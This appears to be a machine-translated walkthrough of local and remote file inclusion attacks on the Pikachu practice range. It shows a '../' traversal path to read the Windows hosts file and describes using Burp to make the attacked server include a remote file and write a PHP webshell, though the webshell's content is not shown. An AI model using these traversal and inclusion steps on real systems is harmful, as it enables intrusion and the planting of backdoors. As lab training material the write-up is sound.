Pikachu range with an example:
1- Local Inclusion Vulnerabilities
With "../" directory way to jump, read files in another directory
For example, windows: ../../../../ Windows / System32 / drivers / etc / hosts
Demo: First of all normal links
We change the link information
Discover local host information is displayed, success.
2- remote file include combat demo:
Pikachu range with an example:
Attacked server: 192.168.36.129
Keep remote code file server: 192.168.36.131
Attacker: native browser
Tips for Finding the viewing range according to the relevant server path
Then write to a file on a remote server yijuhua.txt
It reads as follows:
Advance open burp, and then choose a good range information click submit inquiry
burp capture packets, modify information
Forward then sends
Next View server to be attacked, found
One more yijuhua.php file uploaded successfully, then verify
success.